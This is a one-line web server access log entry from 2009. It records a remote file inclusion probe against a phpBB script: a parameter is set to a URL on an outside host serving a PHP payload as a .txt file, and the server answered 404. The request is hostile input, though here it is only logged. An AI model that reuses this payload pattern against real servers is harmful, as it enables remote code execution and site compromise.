216.227.249.185 - - [20/Jul/2009:02:37:58 -0400] "GET /logs/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.sks75.rj.pl/media/php.txt????? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
